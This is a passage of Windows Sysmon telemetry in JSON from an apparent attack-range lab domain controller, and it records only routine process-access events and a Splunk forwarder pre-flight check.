ws\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1859,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1860,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1861,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1862,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1863,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.736\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-001085C40300}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.736","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-001085C40300}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1864,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.740\r\nProcessGuid: {41C8662E-1F75-5F25-0000-00106CC50300}\r\nProcessId: 3824\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nFileVersion: 8.0.2\r\nDescription: splunk Application\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt \r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3\r\nParentProcessGuid: {41C8662E-1F75-5F25-0000-001085C40300}\r\nParentProcessId: 3852\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal pre-flight-checks --answer-yes --no-prompt 2>&1","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.740","ProcessGuid":"{41C8662E-1F75-5F25-0000-00106CC50300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","FileVersion":"8.0.2","Description":"splunk Application","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3","ParentProcessGuid":"{41C8662E-1F75-5F25-0000-001085C40300}","ParentProcessId":"3852","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal pre-flight-checks --answer-yes --no-prompt 2&gt;&amp;1","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1865,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.736\r\nSourceProcessGUID: {41C8662E-1F75-5F25-0000-001085C40300}\r\nSourceProcessId: 3852\r\nSourceThreadId: 2124\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-00107A600300}\r\nTargetProcessId: 3824\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.736","SourceProcessGUID":"{41C8662E-1F75-5F25-0000-001085C40300}","SourceProcessId":"3852","SourceThreadId":"2124","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-00107A600300}","TargetProcessId":"3824","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1866,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.736\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-00107A600300}\r\nTargetProcessId: 3824\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.736","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-00107A600300}","TargetProcessId":"3824","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1867,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
